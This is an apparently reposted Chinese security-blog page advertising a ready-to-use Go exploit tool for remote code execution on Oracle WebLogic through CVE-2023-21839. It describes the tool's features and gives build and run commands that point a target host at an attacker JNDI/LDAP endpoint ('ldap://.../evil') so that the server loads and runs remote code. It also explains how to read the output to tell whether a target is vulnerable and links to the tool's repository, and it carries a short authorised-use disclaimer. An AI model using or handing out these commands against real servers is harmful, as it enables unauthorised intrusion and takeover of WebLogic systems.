Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)

admin
admin
admin
102737
文章
87
评论
2023年2月25日15:51:19评论103 views字数 602阅读2分0秒阅读模式

CVE-2023-21839

未经授权许可使用本项目攻击或测试目标是非法的,本程序应仅用于授权的安全测试与研究目的

Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)

介绍

Weblogic CVE-2023-21839 RCE

(1)无需任何 Java 依赖,构造协议通过socket直接RCE

(2)已解决 IIOP 的 NAT 网络问题(可测试 Docker 与公网目标)

(3)在 Windows/Mac OS/Linux 以及 Weblogic 12/14 中测试通过

(4)请使用 JDK 8u191 以下启动 Weblogic 并自行搭建 JNDI Server

使用

Linux/Mac OS

cd cmdgo build -o CVE-2023-21839./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

Windows

cd cmdgo build -o CVE-2023-21839.exeCVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

如果发现 panic 或有其他报错,说明目标不存在漏洞(或关闭了 IIOP 功能)

本地测试:

Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)

某师傅公网测试:

Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)

项目地址:https://github.com/4ra1n/CVE-2023-21839

原文始发于微信公众号(Ots安全):Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月25日15:51:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)http://cn-sec.com/archives/1574519.html

发表评论

匿名网友 填写信息